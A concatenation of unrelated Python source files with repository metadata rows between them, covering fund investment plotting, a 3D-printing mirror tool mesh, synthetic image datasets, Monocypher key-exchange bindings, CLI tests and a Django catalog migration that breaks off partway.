    # DataFrame.append was removed in pandas 2.0.
    summaries = [
        StochasticAIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            Freq=Freq,
            seed=current_seed,
            df=False,
            AIP=True,
        )
        for current_seed in seed
    ]
    if not summaries:
        return pd.DataFrame()
    return pd.concat(summaries)
def StochasticAIP_Weekly_plot(
    code,
    start_date,
    end_date,
    fund_category,
    fixed_investment=1000,
    Seed=[1, 2, 3, 4, 5],
    figsize=(12, 8),
):
    """Plot the cumulative random-day AIP return for each seed in ``Seed``, with the lump-sum return on a secondary axis."""
    figure, axis = plt.subplots(figsize=figsize)
    # One cumulative-return curve per random seed.
    for seed_value in Seed:
        random_plan_df = StochasticAIP_Weekly(
            code,
            start_date=start_date,
            end_date=end_date,
            fund_category=fund_category,
            fixed_investment=fixed_investment,
            Freq=5,
            seed=seed_value,
            AIP=True,
            df=True,
        )
        axis.plot(random_plan_df.净值日期, random_plan_df.累计收益率, label="Seed " + str(seed_value))
    axis.legend()
    axis.set_xlabel("净值日期", fontsize=14)
    axis.set_ylabel("定投累计收益", fontsize=14)
    # Lump-sum ("direct") investment curve drawn on a secondary y axis.
    direct_df = StochasticAIP_Weekly(
        code,
        start_date=start_date,
        end_date=end_date,
        fund_category=fund_category,
        fixed_investment=1000,
        Freq=5,
        seed=123,
        AIP=False,
        df=True,
    )
    secondary_axis = axis.twinx()
    secondary_axis.plot(
        direct_df.净值日期,
        direct_df["直投累计收益率"],
        "r--",
        label="直投累计收益率",
    )
    secondary_axis.legend(loc="upper right")
    secondary_axis.set_ylabel("直投累计收益率", fontsize=14)
    plt.show()
| 31.625448
| 87
| 0.541962
| 2,176
| 17,647
| 4.077206
| 0.06296
| 0.174369
| 0.29486
| 0.042493
| 0.881988
| 0.863052
| 0.848061
| 0.839044
| 0.833183
| 0.806808
| 0
| 0.02198
| 0.303904
| 17,647
| 557
| 88
| 31.682226
| 0.700261
| 0
| 0
| 0.744283
| 0
| 0
| 0.109424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018711
| false
| 0
| 0.004158
| 0
| 0.04158
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
82f6af3736bed6742bf2f65c955fd18f2df64d3f
| 4,505
|
py
|
Python
|
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Scene.ToolHandle import ToolHandle
from UM.View.Renderer import Renderer
from UM.Mesh.MeshData import MeshData
from UM.Mesh.MeshBuilder import MeshBuilder
from UM.Math.Vector import Vector
## Provides the two pyramid-shaped toolhandles for each axis for the mirror tool
class MirrorToolHandle(ToolHandle):
    """Provides the two pyramid-shaped toolhandles for each axis for the mirror tool."""

    def __init__(self, parent = None):
        self._name = "MirrorToolHandle"
        super().__init__(parent)
        # Pyramid dimensions and their distance from the origin.
        self._handle_width = 8
        self._handle_height = 14
        self._handle_position = 20

    def buildMesh(self):
        mb = MeshBuilder()
        offset = self._handle_position
        # One entry per handle, in the order +Y, -Y, +X, -X, -Z, +Z:
        # (center, rotation axis or None, rotation angle, solid color, selection color).
        pyramid_specs = [
            (Vector(0, offset, 0), None, 0, self._y_axis_color, ToolHandle.YAxisSelectionColor),
            (Vector(0, -offset, 0), Vector.Unit_X, 180, self._y_axis_color, ToolHandle.YAxisSelectionColor),
            (Vector(offset, 0, 0), Vector.Unit_Z, 90, self._x_axis_color, ToolHandle.XAxisSelectionColor),
            (Vector(-offset, 0, 0), Vector.Unit_Z, -90, self._x_axis_color, ToolHandle.XAxisSelectionColor),
            (Vector(0, 0, -offset), Vector.Unit_X, 90, self._z_axis_color, ToolHandle.ZAxisSelectionColor),
            (Vector(0, 0, offset), Vector.Unit_X, -90, self._z_axis_color, ToolHandle.ZAxisSelectionColor),
        ]

        def add_pyramid(center, axis, angle, color):
            # Rotation arguments are only passed when a rotation is needed,
            # matching the original per-handle calls exactly.
            kwargs = dict(
                width = self._handle_width,
                height = self._handle_height,
                depth = self._handle_width,
                center = center,
                color = color,
            )
            if axis is not None:
                kwargs["axis"] = axis
                kwargs["angle"] = angle
            mb.addPyramid(**kwargs)

        # Solid mesh: one visible pyramid per handle.
        for center, axis, angle, solid_color, _ in pyramid_specs:
            add_pyramid(center, axis, angle, solid_color)
        self.setSolidMesh(mb.build())

        # Selection mesh, drawn with the per-axis picking colors.
        # NOTE(review): the same MeshBuilder is reused here without being
        # reset, so the selection mesh also contains the solid-colored
        # pyramids.  Behavior preserved as-is; confirm whether a fresh
        # MeshBuilder was intended before the selection pass.
        for center, axis, angle, _, selection_color in pyramid_specs:
            add_pyramid(center, axis, angle, selection_color)
        self.setSelectionMesh(mb.build())
| 31.284722
| 81
| 0.555605
| 461
| 4,505
| 5.127983
| 0.164859
| 0.215736
| 0.158629
| 0.106599
| 0.769882
| 0.769882
| 0.769882
| 0.766497
| 0.766497
| 0.766497
| 0
| 0.019458
| 0.361154
| 4,505
| 143
| 82
| 31.503497
| 0.801946
| 0.043285
| 0
| 0.733333
| 0
| 0
| 0.003718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016667
| false
| 0
| 0.041667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2259d921b4d5937d5d2f0d123c1cfbd95c8f5e6
| 1,599
|
py
|
Python
|
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
import torch
import torchvision.transforms as TF
from torch.utils.data import Dataset
class ColoredColumns(Dataset):
    """
    A dataset of procedurally generated images of columns randomly colorized.

    Args:
        *size (int): size of images
        transform (transforms or None): the image transforms to apply to the
            generated pictures
    """

    def __init__(self, *size, transform=None) -> None:
        super(ColoredColumns, self).__init__()
        self.size = size
        # Fall back to the identity function when no transform is supplied.
        if transform is None:
            transform = lambda x: x
        self.transform = transform

    def __len__(self):
        # The images are generated on the fly; report a fixed epoch length.
        return 10000

    def __getitem__(self, i):
        # One random color per column, broadcast down all rows.
        column_colors = torch.randint(0, 255, (3, 1, self.size[1]))
        image_tensor = column_colors.expand(3, *self.size).float() / 255
        pil_image = TF.ToPILImage()(image_tensor)
        return self.transform(pil_image), 0
class ColoredRows(Dataset):
    """
    A dataset of procedurally generated images of rows randomly colorized.

    Args:
        *size (int): size of images
        transform (transforms or None): the image transforms to apply to the
            generated pictures
    """

    def __init__(self, *size, transform=None) -> None:
        super(ColoredRows, self).__init__()
        self.size = size
        # Fall back to the identity function when no transform is supplied.
        if transform is None:
            transform = lambda x: x
        self.transform = transform

    def __len__(self):
        # The images are generated on the fly; report a fixed epoch length.
        return 10000

    def __getitem__(self, i):
        # One random color per row, broadcast across all columns.
        row_colors = torch.randint(0, 255, (3, self.size[0], 1))
        image_tensor = row_colors.expand(3, *self.size).float() / 255
        pil_image = TF.ToPILImage()(image_tensor)
        return self.transform(pil_image), 0
| 30.75
| 78
| 0.631645
| 201
| 1,599
| 4.865672
| 0.293532
| 0.06544
| 0.04908
| 0.034765
| 0.799591
| 0.764826
| 0.764826
| 0.764826
| 0.670757
| 0.670757
| 0
| 0.028936
| 0.265166
| 1,599
| 51
| 79
| 31.352941
| 0.803404
| 0.263915
| 0
| 0.592593
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.074074
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d233df9bb2a4df76bf68b186b17cf9c43281b4cf
| 1,411
|
py
|
Python
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 4
|
2021-07-03T00:20:05.000Z
|
2022-01-18T23:07:34.000Z
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 3
|
2021-12-30T17:32:24.000Z
|
2022-01-19T23:04:51.000Z
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 1
|
2022-01-16T09:48:13.000Z
|
2022-01-16T09:48:13.000Z
|
from monocypher.utils import ensure_length
from monocypher._monocypher import lib, ffi
def crypto_key_exchange(your_secret_key, their_public_key):
    """Derive the 32-byte shared secret from our secret key and their public key."""
    # Both keys must be exactly 32 bytes.
    ensure_length('your_secret_key', your_secret_key, 32)
    ensure_length('their_public_key', their_public_key, 32)
    secret_buf = ffi.from_buffer('uint8_t[32]', your_secret_key)
    public_buf = ffi.from_buffer('uint8_t[32]', their_public_key)
    # Output buffer filled in by the C library.
    shared_secret = ffi.new('uint8_t[32]')
    lib.crypto_key_exchange(shared_secret, secret_buf, public_buf)
    return bytes(shared_secret)
def crypto_key_exchange_public_key(your_secret_key):
    """Compute the 32-byte key-exchange public key for a 32-byte secret key."""
    ensure_length('your_secret_key', your_secret_key, 32)
    secret_buf = ffi.from_buffer('uint8_t[32]', your_secret_key)
    # Output buffer filled in by the C library.
    public_key = ffi.new('uint8_t[32]')
    lib.crypto_key_exchange_public_key(public_key, secret_buf)
    return bytes(public_key)
def crypto_x25519(your_secret_key, their_public_key):
    """Perform raw X25519 scalar multiplication, returning the 32-byte shared point."""
    # Both keys must be exactly 32 bytes.
    ensure_length('your_secret_key', your_secret_key, 32)
    ensure_length('their_public_key', their_public_key, 32)
    secret_buf = ffi.from_buffer('uint8_t[32]', your_secret_key)
    public_buf = ffi.from_buffer('uint8_t[32]', their_public_key)
    # Output buffer filled in by the C library.
    shared_point = ffi.new('uint8_t[32]')
    lib.crypto_x25519(shared_point, secret_buf, public_buf)
    return bytes(shared_point)
def crypto_x25519_public_key(your_secret_key):
    """Return the 32-byte X25519 public key for a 32-byte secret key."""
    ensure_length('your_secret_key', your_secret_key, 32)
    secret_buf = ffi.from_buffer('uint8_t[32]', your_secret_key)
    public_buf = ffi.new('uint8_t[32]')
    lib.crypto_x25519_public_key(public_buf, secret_buf)
    return bytes(public_buf)
| 30.021277
| 59
| 0.739192
| 226
| 1,411
| 4.207965
| 0.119469
| 0.168244
| 0.218717
| 0.100946
| 0.880126
| 0.868559
| 0.868559
| 0.81388
| 0.725552
| 0.702419
| 0
| 0.051325
| 0.14387
| 1,411
| 46
| 60
| 30.673913
| 0.735927
| 0
| 0
| 0.666667
| 0
| 0
| 0.143161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24a13b20bb8fd40a92d8065e9bd1082958c1c5c
| 166
|
py
|
Python
|
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
from bender_mc.api.video import video_api_blueprint
from bender_mc.api.media_center import media_center_api_blueprint
from bender_mc.api.slots import slots_blueprint
| 41.5
| 65
| 0.891566
| 28
| 166
| 4.928571
| 0.357143
| 0.217391
| 0.26087
| 0.326087
| 0.391304
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072289
| 166
| 3
| 66
| 55.333333
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
9637be8e880eb4face797226c0e3d590f703e605
| 176
|
py
|
Python
|
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | 8
|
2018-03-05T05:13:39.000Z
|
2021-02-27T03:12:05.000Z
|
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | null | null | null |
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | 4
|
2018-09-04T04:44:26.000Z
|
2021-07-22T06:34:51.000Z
|
from microtbs_rl.algorithms.a2c.agent_a2c import AgentA2C
from microtbs_rl.algorithms.a2c.multi_env import MultiEnv
from microtbs_rl.algorithms.a2c import train_a2c, enjoy_a2c
| 44
| 59
| 0.875
| 28
| 176
| 5.25
| 0.464286
| 0.244898
| 0.285714
| 0.489796
| 0.55102
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042945
| 0.073864
| 176
| 3
| 60
| 58.666667
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
963f089a437ef73fb7d6ff82bc0874009365dad8
| 1,532
|
py
|
Python
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 25
|
2019-11-18T22:42:31.000Z
|
2019-11-25T16:21:56.000Z
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 6
|
2019-11-19T19:55:16.000Z
|
2019-11-25T18:51:42.000Z
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 3
|
2019-11-18T22:39:25.000Z
|
2019-11-20T23:22:34.000Z
|
from unittest.mock import Mock, patch
from rpdk.core.cli import main
from rpdk.core.project import Project
def test_generate_command_generate(capsys):
    """`generate` with no flags loads the project, generates artifacts and
    docs with default (None) endpoint/region, and prints the type name."""
    project = Mock(spec=Project)
    project.type_name = "foo"
    with patch("rpdk.core.generate.Project", autospec=True, return_value=project):
        main(args_in=["generate"])
    project.load.assert_called_once_with()
    project.generate.assert_called_once_with(None, None, [])
    project.generate_docs.assert_called_once_with()
    out, err = capsys.readouterr()
    assert "foo" in out
    assert not err
def test_generate_command_generate_with_args(capsys):
    """`generate` forwards --endpoint-url, --region and the --target-schemas
    list straight through to Project.generate."""
    project = Mock(spec=Project)
    project.type_name = "foo"
    cli_args = [
        "generate",
        "--endpoint-url",
        "http://localhost/3001",
        "--region",
        "us-east-1",
        "--target-schemas",
        "/files/target-schema.json",
        "/files/other-target-schema",
    ]
    with patch("rpdk.core.generate.Project", autospec=True, return_value=project):
        main(args_in=cli_args)
    project.load.assert_called_once_with()
    project.generate.assert_called_once_with(
        "http://localhost/3001",
        "us-east-1",
        ["/files/target-schema.json", "/files/other-target-schema"],
    )
    project.generate_docs.assert_called_once_with()
    out, err = capsys.readouterr()
    assert "foo" in out
    assert not err
| 29.461538
| 87
| 0.639687
| 185
| 1,532
| 5.048649
| 0.275676
| 0.141328
| 0.102784
| 0.12848
| 0.805139
| 0.740899
| 0.740899
| 0.740899
| 0.740899
| 0.740899
| 0
| 0.008621
| 0.24282
| 1,532
| 51
| 88
| 30.039216
| 0.796552
| 0
| 0
| 0.5
| 1
| 0
| 0.182768
| 0.100522
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.05
| false
| 0
| 0.075
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
964581f248d3f3dc36804a02b238885d30f79a83
| 13,531
|
py
|
Python
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | 2
|
2020-04-26T07:28:38.000Z
|
2022-03-31T14:24:44.000Z
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | 9
|
2017-12-01T04:43:31.000Z
|
2022-01-01T13:26:04.000Z
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-12-21 13:30
import django.contrib.postgres.indexes
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
from django.contrib.postgres.operations import BtreeGinExtension
class Migration(migrations.Migration):
    """Initial schema for the ``pflops`` app.

    Declares the catalog models (Category, Product, Vendor, ...) and
    installs the PostgreSQL ``btree_gin`` extension before adding a
    GinIndex over the product search fields at the end.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        # Must run before the GinIndex on Product below can be created.
        BtreeGinExtension(),
        # Self-referential category tree ('parent' points at pflops.category).
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(db_index=True)),
                ('level', models.IntegerField(default=0)),
                ('order', models.IntegerField(default=0)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.category')),
            ],
            options={
                'ordering': ['created'],
            },
        ),
        migrations.CreateModel(
            name='Currency',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('key', models.CharField(max_length=32, unique=True)),
                ('key_digit', models.CharField(default=None, max_length=32, null=True)),
                ('name', models.TextField(db_index=True, default=None, null=True)),
                ('html', models.TextField(db_index=True, default=None, null=True)),
                ('full_name', models.TextField(db_index=True, default=None, null=True)),
                ('quantity', models.FloatField(default=1.0)),
                ('rate', models.FloatField(default=1.0)),
            ],
            options={
                'ordering': ['key'],
            },
        ),
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('file_name', models.TextField(default=None, null=True)),
                ('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
            ],
            options={
                'ordering': ['-created'],
            },
        ),
        migrations.CreateModel(
            name='Parameter',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(db_index=True, default=None, null=True)),
                ('description', models.TextField(default=None, null=True)),
                ('order', models.IntegerField(default=0)),
            ],
            options={
                'ordering': ['order'],
            },
        ),
        migrations.CreateModel(
            name='ParameterGroup',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(db_index=True, default=None, null=True)),
                ('order', models.IntegerField(default=0)),
            ],
            options={
                'ordering': ['order'],
            },
        ),
        migrations.CreateModel(
            name='Price',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('value', models.DecimalField(decimal_places=2, max_digits=18)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('currency', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.currency')),
            ],
            options={
                'ordering': ['created'],
            },
        ),
        # Central product table; 'names_search'/'parameters_search' feed the
        # GIN full-text index added at the bottom of this migration.
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('part_number', models.TextField(db_index=True, default=None, null=True)),
                ('names_search', models.TextField(db_index=True, default=None, null=True)),
                ('parameters_search', models.TextField(db_index=True, default=None, null=True)),
                ('slug', models.TextField(db_index=True, default=None, null=True)),
                ('name', models.TextField(db_index=True, default=None, null=True)),
                ('short_name', models.TextField(db_index=True, default=None, null=True)),
                ('name_rus', models.TextField(db_index=True, default=None, null=True)),
                ('name_other', models.TextField(db_index=True, default=None, null=True)),
                ('description', models.TextField(default=None, null=True)),
                ('warranty', models.TextField(default=None, null=True)),
                ('ean_128', models.TextField(db_index=True, default=None, null=True)),
                ('upc', models.TextField(db_index=True, default=None, null=True)),
                ('pnc', models.TextField(db_index=True, default=None, null=True)),
                ('hs_code', models.TextField(db_index=True, default=None, null=True)),
                ('gtin', models.TextField(db_index=True, default=None, null=True)),
                ('tnved', models.TextField(db_index=True, default=None, null=True)),
                ('traceable', models.BooleanField(db_index=True, default=None, null=True)),
                ('quantity', models.IntegerField(default=None, null=True)),
                ('quantity_great_than', models.BooleanField(db_index=True, default=None, null=True)),
                ('weight', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
                ('width', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
                ('height', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
                ('depth', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
                ('volume', models.DecimalField(decimal_places=9, default=None, max_digits=18, null=True)),
                ('multiplicity', models.IntegerField(default=None, null=True)),
                ('content', models.TextField(default=None, null=True)),
                ('content_loaded', models.DateTimeField(default=None, null=True)),
                ('images_loaded', models.DateTimeField(default=None, null=True)),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(default=None, null=True)),
                ('edited', models.DateTimeField(default=None, null=True)),
                ('category', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.category')),
                ('price', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.price')),
            ],
            options={
                'ordering': ['-created'],
            },
        ),
        migrations.CreateModel(
            name='Unit',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(db_index=True, default=None, null=True)),
                ('full_name', models.TextField(db_index=True, default=None, null=True)),
            ],
            options={
                'ordering': ['name'],
            },
        ),
        migrations.CreateModel(
            name='Vendor',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(db_index=True)),
                ('slug', models.TextField(db_index=True, default=None, null=True)),
            ],
            options={
                'ordering': ['name'],
            },
        ),
        migrations.CreateModel(
            name='ProductImage',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('source_url', models.TextField(db_index=True, default=None, null=True)),
                ('file_name', models.TextField(default=None, null=True)),
                ('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
                ('product', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.product')),
            ],
            options={
                'ordering': ['created'],
            },
        ),
        # Product.unit / Product.vendor are added after Unit and Vendor exist.
        migrations.AddField(
            model_name='product',
            name='unit',
            field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.unit'),
        ),
        migrations.AddField(
            model_name='product',
            name='vendor',
            field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.vendor'),
        ),
        migrations.CreateModel(
            name='ParameterValue',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('value', models.TextField(db_index=True, default=None, null=True)),
                ('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
                ('parameter', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.parameter')),
                ('product', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.product')),
                ('unit', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.unit')),
            ],
            options={
                'ordering': ['created'],
            },
        ),
        migrations.AddField(
            model_name='parameter',
            name='group',
            field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='pflops.parametergroup'),
        ),
        migrations.CreateModel(
            name='CatalogElement',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('title', models.TextField(db_index=True)),
                ('slug', models.TextField(db_index=True, default=None, null=True)),
                ('path', models.TextField(db_index=True, default=None, null=True)),
                ('content', models.TextField(default=None, null=True)),
                ('description', models.TextField(default=None, null=True)),
                ('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
                ('edited', models.DateTimeField(db_index=True, default=None, null=True)),
                ('published', models.DateTimeField(db_index=True, default=None, null=True)),
                ('image', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.image')),
                ('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.catalogelement')),
            ],
            options={
                'ordering': ['-created'],
            },
        ),
        # NOTE(review): Article.parent points at pflops.catalogelement, not at
        # Article itself — looks intentional (articles hang off catalog nodes),
        # but worth confirming with the app's models.
        migrations.CreateModel(
            name='Article',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('title', models.TextField(db_index=True)),
                ('slug', models.TextField(db_index=True, default=None, null=True)),
                ('path', models.TextField(db_index=True, default=None, null=True)),
                ('content', models.TextField(default=None, null=True)),
                ('description', models.TextField(default=None, null=True)),
                ('assistant', models.BooleanField(db_index=True, default=False)),
                ('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now)),
                ('edited', models.DateTimeField(db_index=True, default=None, null=True)),
                ('published', models.DateTimeField(db_index=True, default=None, null=True)),
                ('image', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.image')),
                ('parent', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='pflops.catalogelement')),
            ],
            options={
                'ordering': ['-created'],
            },
        ),
        # GIN index for full-text style lookups over the two search columns;
        # requires the btree_gin extension installed above.
        migrations.AddIndex(
            model_name='product',
            index=django.contrib.postgres.indexes.GinIndex(fields=['names_search', 'parameters_search'], name='product_search_idx'),
        ),
    ]
| 55.004065
| 163
| 0.578745
| 1,359
| 13,531
| 5.663723
| 0.105224
| 0.073795
| 0.124724
| 0.157984
| 0.856048
| 0.841237
| 0.783162
| 0.758997
| 0.73756
| 0.67208
| 0
| 0.006171
| 0.269455
| 13,531
| 245
| 164
| 55.228571
| 0.772484
| 0.003326
| 0
| 0.617647
| 1
| 0
| 0.094705
| 0.004672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02521
| 0
